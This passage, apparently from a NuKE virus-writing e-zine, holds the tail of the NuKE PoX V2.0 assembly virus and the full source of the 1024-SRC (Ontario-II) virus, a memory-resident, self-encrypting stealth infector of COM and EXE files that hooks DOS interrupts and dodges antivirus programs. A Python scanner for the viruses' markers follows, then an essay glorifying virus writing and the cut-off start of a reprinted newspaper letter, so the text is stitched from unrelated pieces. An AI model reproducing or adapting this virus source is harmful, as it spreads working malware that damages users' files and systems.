mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
closing_over: jmp closing_no_good
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me proc
mov ah,40h
mov dx,offset init_virus
mov cx,virus_size
call calldos21
jc exit_error ;Error Split
mov ax,4200h
xor cx,cx ;Pointer back to
xor dx,dx ;top of file
call calldos21
jc exit_error ;Split Dude...
clc ;Clear carry flag
ret
exit_error:
stc ;Set carry flag
ret
infect_me endp
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; DisInfection Routine for 4B
;-------------------------------------------------------------------------
Disinfect PROC
push ax
push bx ;Save them
push cx
push dx
push ds
mov ax,4300h ;Get file Attribs
call calldos21
test cl,1h ;Test for Normal Attribs
jz okay_dis ;Yes, File can be opened
and cl,0feh ;No, Set them to Normal
mov ax,4301h ;Save attribs to file
call calldos21
jc half_way
okay_dis: mov ax,3d02h ;File now can be opened
call calldos21 ;Safely
jc half_way
mov bx,ax ;Put File Handle in BX
mov ax,5700h ;Get File Time & Date
call calldos21
mov al,cl ;Check to see if infected
or cl,1fh ;Unmask Seconds
dec cx ;Test to see if 60 seconds
xor al,cl
jnz half_way ;No, Quit File AIN'T
dec cx
mov word ptr cs:[old_time],cx
mov word ptr cs:[old_date],dx
mov ax,4202h ;Yes, file is infected
xor cx,cx ;Goto the End of File
xor dx,dx
call calldos21
push cs
pop ds
mov cx,dx ;Save Location into
mov dx,ax ;CX:DX
push cx ;Push them for later use
push dx
sub dx,1Bh ;Subtract file 1Bh from the
sbb cx,0 ;End so you will find the
mov ax,4200h ;Original EXE header or
call calldos21 ;First 3 bytes for COMs
mov ah,3fh ;Read them into Buffer
mov cx,1Bh ;Read all of the 1B bytes
mov dx,offset buffer ;Put them into our buffer
call calldos21
jmp half
half_way: jmp end_dis
half: xor cx,cx ;
xor dx,dx ;Goto the BEGINNING of file
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer ;from buffer to COM
mov cx,1Bh
cmp word ptr cs:[buffer],5A4Dh
je dis_exe_jmp
mov cx,3h
dis_exe_jmp: call calldos21
pop dx ;Restore CX:DX which they
pop cx ;to the End of FILE
sub dx,virus_size ;Remove Virus From the END
sbb cx,0 ;of the Orignal File
mov ax,4200h ;Get new EOF
call calldos21
mov ah,40h ;Write new EOF to File
xor cx,cx
call calldos21
mov cx,word ptr cs:[old_time]
mov dx,word ptr cs:[old_date]
mov ax,5701h
call calldos21
mov ah,3eh ;Close File
call calldos21
end_dis: pop ds
pop dx
pop cx ;Restore 'em
pop bx
pop ax
ret
disinfect ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check File Extension DS:DX ASCIIZ
;--------------------------------------------------------------------------
Check_extension PROC
push si
push cx
mov si,dx
mov cx,256h
loop_me: cmp byte ptr ds:[si],2eh
je next_ok
inc si
loop loop_me
next_ok: cmp word ptr ds:[si+1],'OC'
jne next_1
cmp byte ptr ds:[si+3],'M'
je good_file
next_1: cmp word ptr ds:[si+1],'oc'
jne next_2
cmp byte ptr ds:[si+3],'m'
je good_file
next_2: pop cx
pop si
stc
ret
good_file: pop cx
pop si
clc
ret
Check_extension ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check File Extension DS:DX ASCIIZ
;-------------------------------------------------------------------------
Check_exten_exe PROC
push si
push cx
mov si,dx
mov cx,256h
loop_me_exe: cmp byte ptr ds:[si],2eh
je next_ok_exe
inc si
loop loop_me_exe
next_ok_exe: cmp word ptr ds:[si+1],'XE'
jne next_1_exe
cmp byte ptr ds:[si+3],'E'
je good_file_exe
next_1_exe: cmp word ptr ds:[si+1],'xe'
jne next_2_exe
cmp byte ptr ds:[si+3],'e'
je good_file_exe
next_2_exe: pop cx
pop si
stc
ret
good_file_exe: pop cx
pop si
clc
ret
Check_exten_exe ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Call Int_21h Okay
;-------------------------------------------------------------------------
calldos21 PROC
pushf
call dword ptr cs:[int21]
retn
calldos21 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; MultiPly
;--------------------------------------------------------------------------
multiply PROC
push bx
push cx
mov cl,0Ch
shl dx,cl
xchg bx,ax
mov cl,4
shr bx,cl
and ax,0Fh
add dx,bx
pop cx
pop bx
retn
multiply ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check for AV file... Like SCAN.EXE or F-PROT.EXE
;-------------------------------------------------------------------------
Check_4_av PROC
push si
push cx
mov si,dx
mov cx,256h
av: cmp byte ptr ds:[si],2eh
je av1
inc si
loop av
av1: cmp word ptr ds:[si-2],'NA'
jnz av2
cmp word ptr ds:[si-4],'CS'
jz fuck_av
av2: cmp word ptr ds:[si-2],'NA'
jnz av3
cmp word ptr ds:[si-4],'EL'
jz fuck_av
av3: cmp word ptr ds:[si-2],'TO'
jnz not_av
cmp word ptr ds:[si-4],'RP'
jz fuck_av
not_av: pop cx
pop si
clc
ret
fuck_av: pop cx
pop si
stc
ret
Check_4_av ENDP
msg db "NuKE PoX V2.0 - Rock Steady"
old_time dw 0
old_date dw 0
file_handle dw 0
jump_address db 0E9h,90h,90h
buffer db 90h,0CDh,020h ;\
db 18h DUP (00) ;-Make 1Bh Bytes
last:
seg_a ends
end start
;==========================================================================
;=========================================================================
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; 1024-SRC Virus (Ontario-II) by Death Angel
; ========
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;This VIRUS was only written as an experiment to see how far a computer
;virus could go through development. This particular virus in its present
;form WILL NOT do any damage to your data or go off bouncing a ball across
;your screen or play Yankee Doodle, IT WILL ONLY infect programs.
;
; Virus Information:
; Hides: In upper RAM, requires 3K of memory.
; Size: 1K (exactly when attached to either EXE or COM files)
; ID: Seconds in date of file is set to 32 (impossible value)
; .COM files, the 4th byte is 'O'
; .EXE files, the stack pointer is 0600h
;
; Cover-Up: If loaded with DEBUG, it will remove itself from memory.
; When doing a DIR, it will cover up the filesize increase.
;
;Notes: Also infects on a file open if the file ends in COM,EXE or OVL
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Stack_Size Equ 512+1

Code Segment Para Public 'CODE'
Assume Cs:Code, Ds:Code
Org 0000h

Jmpfar Macro addr
db 0EAh
dd addr
Endm

Callfar Macro addr
db 09Ah
dd addr
Endm

Retfar Macro num
db 0CAh
dw num
Endm

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Do a loop to decode the rest of the virus.

Virus_Begin:

V00: Mov Bx, offset V05-V05_Back
V04: Mov Cx, offset Start_Code-(offset V05-V05_Back)
V01: Mov Al, 00h
V02: Add Byte ptr Cs:[Bx], Al
V03: Xor Al, 00h
Inc Bx
Loop V02

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
V05_Back Equ 0

V05: Sub Bx, offset Start_Code
Xchg Ax, Cx
Dec Ax
Int 21h
Or Al, Ah
Je Run_Prog
Push Ds
Xor Di, Di
Mov Ds, Di
Lds Ax, Dword ptr Ds:[21h*4]
Mov Word ptr Cs:[Bx].Saved_21, Ax
Mov Word ptr Cs:[Bx].Saved_21+2, Ds
Mov Cx, Es
Dec Cx
Mov Ds, Cx
Sub Word ptr Ds:[Di+03h], 3072/16
Mov Ax, Word ptr Ds:[Di+12h]
Sub Ax, 3072/16
Mov Word ptr Ds:[Di+12h], Ax
Mov Es, Ax
Sub Ax, 1000h
Mov Word ptr Cs:[Bx+Dos_Seg-2], Ax
Push Cs
Pop Ds
Mov Si, Bx
Mov Cx, offset Start_Code
Cld
Rep Movsb
Mov Ds, Cx
Cli
Mov Word ptr Ds:[21h*4], offset New_21
Mov Word ptr Ds:[21H*4]+2, Es
Sti
Mov Ax, 4BFFh
Push Bx
Int 21h
Pop Bx
Pop Ds
Push Ds
Pop Es

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Run_Prog:
Lea Si, [Bx].Start_Code
Mov Di, 0100h
Cmp Bx, Di
Jb Run_Exe

Run_COM:
Push Di
Movsw
Movsw
Ret

Run_EXE:
Mov Ax, Es
Add Ax, 0010h
Add Word ptr Cs:[Si+02], Ax
Add Word ptr Cs:[Si+04], Ax
Cli
Mov Sp, Word ptr Cs:[Si+06]
Mov Ss, Word ptr Cs:[Si+04]
Sti
Jmp Dword ptr Cs:[Si+00]

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Check_Present:
Inc Ax
Iret

New_21: Cmp Ax, 0FFFFh ; Checking if resident ?
Je Check_Present
Cmp Ah, 4Bh ; Executing a program ?
Je Load_Program
Cmp Ah, 11h ; Doing a DIR ?
Je Find_First
Cmp Ah, 12h ; Doing a DIR ?
Je Find_Next
Cmp Ax, 3D00h ; Opening a file ?
Jne Run_21
Call Open_File
Run_21:
Jmpfar 0 ; Goto vector 21h
Saved_21 Equ $-4

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Find_First:
Find_Next:
Push Bp
Mov Bp, Sp
Cmp Word ptr [Bp+04], 1234h
Dos_Seg:
Pop Bp
Jb Run_21
Call Do_21
Call Save_Regs
Mov Ah, 2Fh
Call Do_21
Cmp Byte ptr Es:[Bx], 0FFh
Je F20
Sub Bx, +7
F20: Mov Al, Byte ptr Es:[Bx].1Eh
And Al, 1Fh
Cmp Al, 1Fh
Jne F00
Mov Dx, Word ptr Es:[Bx].26h
Mov Ax, Word ptr Es:[Bx].24h
Sub Ax, offset Virus_End
Sbb Dx, +00
Or Dx, Dx
Jb F00
Mov Word ptr Es:[Bx].26h, Dx
Mov Word ptr Es:[Bx].24h, Ax
F00: Call Restore_Regs
IRet

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Load_Program:
Cmp Al, 01h
Je Disinfect_DEBUG
Cmp Al, 0FFh
Je Infect_COMSPEC
Call Infect_File
Jmp Run_21

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Infect_COMMAND:
Push Dx
Push Ds
Mov Dx, offset Command_File
Push Cs
Pop Ds
Mov Byte ptr Ds:Command_Flag, 0FFh
Call Infect_File
Pop Ds
Pop Dx
Iret

Infect_COMSPEC:
Mov Ah, 51h
Call Do_21
Mov Es, Bx
Mov Ds, Es:[002Ch]
Xor Si, Si
Push Cs
Pop Es
LP00: Mov Di, offset COMSPEC_name
Mov Cx, 0004h
Rep Cmpsw
Jcxz LP20
LP10: Lodsb
Or Al, Al
Jne LP10
; Cmp Al, Byte ptr [Si]
Cmp Byte ptr [Si], 00
Jne LP00
Jmp Infect_COMMAND
LP20: Mov Dx, Si
Mov Byte ptr Cs:Command_Flag, 0FFh
Call Infect_File
IRet

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Disinfect_DEBUG:
Push Es
Push Bx
Call Do_21
Pop Bx
Pop Es
Call Save_Regs
Jb LP30
Xor Cx, Cx
Lds Si, Dword ptr Es:[Bx].12h
Push Ds
Push Si
Mov Di, 0100h
Cmp Si, Di
Jl DI00
Ja LP31
Lodsb
Cmp Al, 0E9h
Jne LP31
Lodsw
Push Ax
Lodsb
Cmp Al, 'O'
Pop Si
Jne LP31
Add Si, 103h
Inc Cx
Inc Cx
Pop Ax
Push Si
Push Ds
Pop Es
Jmp short DI10
DI00: Lea Di, Dword ptr [Bx].0Eh
Cmp Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2
Jne LP31 ; Note 4B01/decrements stack by 2
DI10: Lodsb
Cmp Al, 0BBh
Jne LP31
Lodsw
Push Ax
Lodsw
Cmp Ax, Word ptr Cs:[V04]
Pop Si
Jne LP31
Add Si, offset Start_Code-(offset V05-V05_Back)
Jcxz DI15
Rep Movsw
Jmp short DI25

DI15: Mov Ah, 51h
Call Do_21
Add Bx, 0010h
Mov Ax, [Si+06h]
Dec Ax
Dec Ax
Stosw
Mov Ax, [Si+04h]
Add Ax, Bx
Stosw
Movsw
Lodsw
Add Ax, Bx
Stosw
DI25: Pop Di
Pop Es
Xchg Cx, Ax
Mov Cx, offset Virus_End
Rep Stosb
Jmp short LP32

LP31: Pop Ax
Pop Ax
LP32: Xor Ax, Ax
Clc
LP30: Call Restore_Regs
Retfar 0002h

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Open_File Proc Near
Call Save_Regs
Mov Si, Dx
OF00: Lodsb
Or Al, Al
Je OF50
Cmp Al, '.'
Jne OF00
Mov Di, offset File_Exts-3
Push Cs
Pop Es
Mov Cx, 0003h
OF10: Push Cx
Push Si
Mov Cl, 03h
Add Di, Cx
Push Di
OF12: Lodsb
And Al, 5Fh
Cmp Al, Byte ptr Es:[Di]
Jne OF15
Inc Di
Loop OF12
Call Infect_File
Add Sp, +6
Jmp short OF50
OF15: Pop Di
Pop Si
Pop Cx
Loop OF10
OF50: Call Restore_Regs
Ret
Open_File Endp

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Infect_File Proc Near
Call Save_Regs
Mov Ax, 4300h
Call Do_21
Jb IF00
Push Cx
And Cl, 01h
Cmp Cl, 01h
Pop Cx
Jne H00
And Cl, 0FEh
Mov Ax, 4301h
Call Do_21
H00: Mov Ax, 3D02h
Call Do_21
Jnb IF02
IF00: Jmp IFE4
IF02: Xchg Bx, Ax
Push Cs
Push Cs
Pop Ds
Pop Es
Mov Ax, 5700h
Call Do_21
Push Dx
Push Cx
And Cl, 1Fh
Cmp Cl, 1Fh
Je IF05
Mov Dx, offset Exe_Header
Mov Cx, offset Exe_Header_End-offset Exe_Header
Mov Ah, 3Fh
Call Do_21
Jnb IF10
IF05: Stc
Jmp IFE2
IF10: Cmp Ax, Cx
Jne IF05
Xor Dx, Dx
Mov Cx, Dx
Mov Ax, 4202h
Call Do_21
Or Dx, Dx
Jne IF12
Cmp Ax, offset Virus_End+Stack_Size
Jb IF05
IF12: Cmp Word ptr Ds:Sign, 'ZM'
Je EXE_type

COM_type:
Cmp Byte ptr Ds:Sign+3, 'O'
Je IF05
Cmp Byte ptr Ds:Command_Flag, 00h
Je CT00
Sub Ax, offset Virus_End
Xchg Dx, Ax
Xor Cx, Cx
Mov Ax, 4200h
Call Do_21
CT00: Mov Si, offset Sign
Mov Di, offset Start_Code
Movsw
Movsw
Sub Ax, 0003h
Mov Byte ptr Ds:Sign, 0E9h
Mov Word ptr Ds:Sign+1, Ax
Mov Byte ptr Ds:Sign+3, 'O'
Add Ax, (offset V05-V05_Back)+0103H
Jmp short IF30

EXE_type:
Cmp Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
Je IF05
Cmp Word ptr Ds:Overlay_Num, 0000h
Jne IF05
Push Dx
Push Ax
Mov Cl, 04h
Ror Dx, Cl
Shr Ax, Cl
Add Ax, Dx
Sub Ax, Word ptr Ds:Size_Header
Mov Si, offset Start_Ip
Mov Di, offset Start_Code
Movsw
Movsw
Mov Si, offset Stack_Ss
Movsw
Movsw
Mov Word ptr Ds:Start_Cs, Ax
Mov Word ptr Ds:Stack_Ss, Ax
Mov Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
Pop Ax
Pop Dx
Push Ax
Add Ax, offset Virus_End+Stack_Size
Jnb IF29
Inc Dx
IF29: Mov Cx, 512
Div Cx
Mov Word ptr Ds:File_Size, Ax
Mov Word ptr Ds:Remainder, Dx
Pop Ax
And Ax, 000Fh
Mov Word ptr Ds:Start_Ip, Ax
Add Ax, (offset V05-V05_Back)

IF30: Mov Word ptr Ds:V00+1, Ax
Push Ds
Xor Si, Si
Mov Ds, Si
Mov Ax, Word ptr Ds:[046Ch]
Pop Ds
Push Bx
Mov Byte ptr Ds:V01+1, Ah
And Ax, 000Fh
Xchg Bx, Ax
Shl Bx, 01h
Mov Ax, Word ptr [Bx].Random_AL
Mov Word ptr Ds:V03, Ax
Mov Di, offset Real_End
Mov Cx, offset Virus_End
Push Cx
Cld
Rep Movsb
Mov Bx, (offset V05-V05_Back)
Push Word ptr [Bx]
Mov Byte ptr [Bx+V05_Back], 0C3h
Push Bx
Xor Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h
Add Bx, offset Real_End ; Toggle ADD [BX],AL/SUB [BX],AL
Call V04
Pop Bx
Pop Word ptr [Bx]
Mov Dx, offset Real_End
Pop Cx
Pop Bx
Mov Ah, 40h
Call Do_21
IFE1: Jb IFE2
Xor Dx, Dx
Mov Cx, Dx
Mov Ax, 4200h
Call Do_21
Jb IFE2
Mov Dx, offset Exe_Header
Mov Cx, offset Exe_Header_End-offset Exe_Header
Mov Ah, 40h
Call Do_21
IFE2: Pop Cx
Pop Dx
Jb IFE3
Cmp Byte ptr Ds:Command_Flag, 0FFh
Je IFE3
Or Cl, 1Fh
IFE3: Mov Ax, 5701h
Call Do_21
Mov Ah, 3Eh
Call Do_21
IFE4: Mov Byte ptr Cs:Command_Flag, 00h
Call Restore_Regs
Ret
Infect_File Endp

Do_21 Proc Near
Pushf
Call Dword ptr Cs:Saved_21
Ret
Do_21 Endp

Save_Regs:
Push Bp
Mov Bp, Sp
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Ds
Push Es
Pushf
Xchg [Bp+02], Ax
Push Ax
Mov Ax, [Bp+02]
Ret

Restore_Regs:
Pop Ax
Xchg [Bp+02], Ax
Popf
Pop Es
Pop Ds
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Bp
Ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Random_AL:
Inc Al ; 0
Dec Al ; 1
Inc Ax ; 2
Inc Ax
Dec Ax ; 3
Dec Ax
Add Al, Cl ; 4
Sub Al, Cl ; 5
Xor Al, Cl ; 6
Xor Al, Ch ; 7
Not Al ; 8
Neg Al ; 9
Ror Al, 01h ; A
Rol Al, 01h ; B
Ror Al, Cl ; C
Rol Al, Cl ; D
Nop ; E
Nop
Add Al, Ch ; F

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

COMSPEC_name db 'COMSPEC='
COMMAND_file db '\COMMAND.COM',0
FILE_Exts db 'COMEXEOVL'
NUM_Exts equ 3

Start_Code dw 00000h
dw 0FFF0h
Start_Stack dw ?
dw 0FFFFh

Org 400h
Virus_End:

Saved_24 dw ?,?

Command_Flag db 0

Temp dw ?

Exe_Header:
Sign dw ?
Remainder dw ?
File_Size dw ?
Num_Real dw ?
Size_Header dw ?
Min_Above dw ?
Max_Above dw ?
Stack_Ss dw ?
Stack_Sp dw ?
CheckSum dw ?
Start_Ip dw ?
Start_Cs dw ?
Display_Real dw ?
Overlay_Num dw ?
Exe_Header_End:

Real_End:

Code Ends
End Virus_Begin
;==========================================================================
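Both listings above document how an infected file can be recognised without running the virus: NuKE PoX and 1024-SRC each force the 5-bit seconds field of the file's DOS time to a value no clock produces (1Eh and 1Fh respectively), 1024-SRC additionally writes an 'O' as the fourth byte of a COM and sets the EXE initial SP to Virus_End+Stack_Size, and both DIR handlers subtract the virus length from the reported file size. The following scanner is an added example in Python, not code from the journal or from either virus: the DirEntry stand-in, the constructed sample files and the indicator names are my own, while the constants come from the listings' comments and equates (the 1800-byte size from the NuKE PoX header, the SP value 401h+201h=601h from the 1024-SRC equates; its header comment rounds this to 0600h).

```python
import struct
from dataclasses import dataclass

# Marker constants taken from the two listings. Both viruses stamp an infected
# file by forcing the 5-bit "seconds/2" field of its DOS time word to a value a
# real clock never produces (the valid range is 0..29).
NUKE_POX_SECONDS2 = 0x1E              # NuKE PoX: (time & 1Fh) == 1Eh ("60 seconds")
NUKE_POX_SIZE = 1800                  # NuKE PoX header: "Bytes: 1800 Bytes"
NUKE_POX_STRING = b"NuKE PoX V2.0 - Rock Steady"   # the 'msg db' in the listing
ONTARIO_SECONDS2 = 0x1F               # 1024-SRC: IFE2 does "Or Cl,1Fh" (62 seconds)
ONTARIO_STACK_SP = 0x400 + (512 + 1)  # offset Virus_End+Stack_Size = 601h (header says 0600h)


@dataclass
class DirEntry:
    """Constructed stand-in for one FAT directory entry plus the file body."""
    name: str
    dos_time: int   # raw 16-bit DOS time word: hhhhh mmmmmm sssss (seconds/2)
    dir_size: int   # size as reported by DIR (FCB search, INT 21h AH=11h/12h)
    data: bytes     # bytes actually read through a file handle


def dos_time_seconds(dos_time: int) -> int:
    """Decode the seconds field of a DOS time word (0..58 for valid times)."""
    return (dos_time & 0x1F) * 2


def scan_entry(e: DirEntry) -> list:
    """Return the indicators found for one entry; an empty list means clean."""
    hits = []
    secs2 = e.dos_time & 0x1F
    if secs2 >= 30:
        hits.append("impossible-seconds:%d" % (secs2 * 2))
    if secs2 == NUKE_POX_SECONDS2:
        hits.append("nuke-pox-timestamp")
    if secs2 == ONTARIO_SECONDS2:
        hits.append("ontario-ii-timestamp")
    # Both DIR handlers subtract the virus length from the FCB size field, so a
    # handle-based size that disagrees with DIR is itself an indicator.
    if e.dir_size != len(e.data):
        hits.append("stealth-size-mismatch:%d" % (len(e.data) - e.dir_size))
    if e.data[:2] == b"MZ" and len(e.data) >= 0x1C:
        # EXE header word at offset 10h is the initial SP (Stack_Sp in the listing).
        sp = struct.unpack_from("<H", e.data, 0x10)[0]
        if sp == ONTARIO_STACK_SP:
            hits.append("ontario-ii-exe-sp")
    elif len(e.data) >= 4 and e.data[0] == 0xE9:
        # COM: 1024-SRC writes 'O' as the 4th byte right after its JMP.
        if e.data[3:4] == b"O":
            hits.append("ontario-ii-com-marker")
        # NuKE PoX stores (original size - 3) as the JMP displacement, so the
        # jump lands on the appended body and the file must be original + 1800.
        rel = struct.unpack_from("<H", e.data, 1)[0]
        if rel + 3 + NUKE_POX_SIZE == len(e.data):
            hits.append("nuke-pox-jmp-geometry")
    if NUKE_POX_STRING in e.data:
        hits.append("nuke-pox-string")
    return hits


def _dos_time(hour: int, minute: int, secs2: int) -> int:
    return (hour << 11) | (minute << 5) | secs2


def _build_samples() -> list:
    """Constructed directory entries: one clean file and three marked ones."""
    clean_com = b"\xb8\x00\x4c\xcd\x21" + b"\x90" * 95          # 100 bytes
    # NuKE PoX-style geometry: JMP to end of original, body appended, DIR lies.
    pox_body = NUKE_POX_STRING + b"\x00" * (NUKE_POX_SIZE - len(NUKE_POX_STRING))
    pox_com = b"\xe9" + struct.pack("<H", len(clean_com) - 3) + clean_com[3:] + pox_body
    # 1024-SRC-style COM: JMP, 'O' marker byte, 1K appended, DIR lies.
    ont_com = (b"\xe9" + struct.pack("<H", 197) + b"O" + b"\x90" * 196
               + b"\x00" * 0x400)
    # 1024-SRC-style EXE: MZ header whose initial SP equals Virus_End+Stack_Size.
    ont_exe = bytearray(0x1C)
    ont_exe[0:2] = b"MZ"
    struct.pack_into("<H", ont_exe, 0x10, ONTARIO_STACK_SP)
    return [
        DirEntry("HELLO.COM", _dos_time(12, 30, 15), len(clean_com), clean_com),
        DirEntry("POX.COM", _dos_time(9, 5, NUKE_POX_SECONDS2), len(clean_com), pox_com),
        DirEntry("ONT.COM", _dos_time(9, 5, ONTARIO_SECONDS2), 200, ont_com),
        DirEntry("ONT.EXE", _dos_time(9, 5, ONTARIO_SECONDS2), len(ont_exe), bytes(ont_exe)),
    ]


SAMPLES = _build_samples()


def scan_all(entries=SAMPLES) -> dict:
    """Map each entry name to its indicator list."""
    return {e.name: scan_entry(e) for e in entries}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print("%-10s %s" % (name, ", ".join(hits) or "clean"))
```

On a real DOS volume the raw time word and the FCB-reported size would come from the directory entry, which is why the check must be done from a clean boot: both viruses patch the DIR results only while resident.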
===========================================================================
Evolution of The Cyberculture
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Something's happening here. What it is ain't exactly clear. There's a
punk with a computer over there, tellin' me I got to beware...

These days, a new breed of young politicized radicals, known as
cyberpunks, roam a techno-underground. These cyberpunks are computer
cowboys riding the trails of cyberspace, circumventing software barriers
in search of information and services or sometimes just to wreak a little
mischievous havoc. They've got the equipment and, they say, the technical
know-how to slip into virtually any computer system and effect changes
with global ramifications. They could effectively cripple the economy or
shut down communications systems round the world. Cyberpunks hold the
potential for becoming the most powerful countercultural force ever.

The government has launched at least two major operations, one in 1990
called Operation Sundevil, to quash the movement. As Secret Service Special
Agent John F. Lewis put it, "There are some very talented individuals who
are unfortunately misdirecting their energies. But to say they're leaps and
bounds ahead of law enforcement personnel isn't true."

Our CyberCulture has been built by the best; it was perhaps started by a
tall and slender person, wearing black jeans and sporting a pair of John
Lennon specs, whom we know as Michael Synergy. Synergy was your basic
computer punk; he spent his time exploring cyberspace, staging his own
quiet protests by going where he wanted, when he wanted. Synergy became so
adept at infiltrating systems that he's become a legend; today he remains
something of an icon in the techno-underground.

Synergy explains that most of his adventures were about becoming educated. At
that time there wasn't a C compiler on microcomputers, so he'd break into
Bell Labs just to learn C. Most hackers, Synergy says, use their talents
simply to learn. In the very beginning Synergy managed to slip into a
supposedly secure top-secret computer network run by the intelligence
community and the Department of Defense (DOD); the DOD then took him out
of cyber-circulation and brought him in to conduct "penetration testing
and security design" for the National Security Agency, Secret Service, and
FBI, as well as the DOD.

Synergy created a huge spark that has developed into our current
Cyberpunk movement. Science fiction took off as well, beginning with
William Gibson's _Neuromancer_ in 1984. The well-known movie
_War Games_ was amongst the first to draw ME (Rock Steady) into the
Cyberpunk world. Other Cyberpunk-oriented works by writers such as Bruce
Sterling (_Schismatrix_, _Islands in the Net_), Pat Cadigan (_Mindplayers_,
_Pretty Boy Crossover_) and John Shirley (_Eclipse Corona_) captured SF fans.
Gibson also came back with two more novels, _Count Zero_ and _Mona Lisa
Overdrive_, as well as an anthology of short stories, _Burning Chrome_.

Of course we can say this all began with Ridley Scott's 1980 movie
_Bladerunner_, loosely based on Philip K. Dick's novel "Do Androids Dream of
Electric Sheep?" The flood has even reached the so-called cyberpunk
bands, which have European roots, including Front-242 (Belgium), Laibach
(Yugoslavia) and Can (Germany).

The flood of culture certainly attracted several punks, many of whom can now
draw their links to such SF culture. However, just like "hacker", the term
"cyberpunk" has also come to mean "computer criminal", and cases like the
1988 Internet "worm" have undoubtedly fed the crackdown fever. Created by
25-year-old Robert Morris, the worm shut down some 6,500 computers and
caused an estimated $150,000 to $200 million worth of damages to computer
systems nationwide.

Since then, there have been several instances of what the hackers claim
are government attempts to suppress the cyberpunk media. Steve Jackson
Games is a case in point. Secret Service agents raided this small
Austin-based game manufacturer, publishers of fantasy role-playing games,
in March of 1990.

With the recent arrests of numerous hackers for illegal entry and data
possession, the battles over control of the electronic frontier and
hackers' rights are now being waged in courts. One critical issue is
whether information belongs to a given corporation or government or
whether it belongs to the world.

Certainly what started off as science fiction isn't science fiction any
more. The several arrests are meant to make an example, and to perhaps
scare ourselves back "into place." Of course this is where the NuKE turning
point arrives; rather than hacking ourselves and risking ourselves
against the lawman, there is the idea of making a program to perhaps work
like ourselves, its mission to bypass software restrictions and perhaps to
send a message to all, or to make the world fall upon their knees and go
crying to Paul Ferguson for help. I can assure you that the cyberpunk
future is still up for grabs, between utopia and dystopia, and whatever it
will be it will be a long, hard battle to the end.

Rock Steady and The NuKE Associates
===========================================================================
===========================================================================
The Truth About Gary...
~~~~~~~~~~~~~~~~~~~~~~~

The following is an actual letter to the editor from the January 18th
issue of the _Chicago Tribune_ (sec. 1, p. 12). I am not making this up.
For your convenience, I've typed it up just as it appears in the paper:


On tolerance

OAK PARK --- This is in
response to "A battle for the
military's soul," by Robert
Maginnis.
How nice of you, sir, as a
lieutenant colonel, to be able to
express the views of an
organization of close to 1
million employees! I also respect
that you, as a stated
heterosexual, also know the
tendencies of the approximately
2.56 million homosexuals in the
United States. And I, having
proudly served seven years in
the military, was doing it wrong!
I should have, as a
homosexual being, been more
promiscuous, tried suicide,
become an alcoholic, contracted
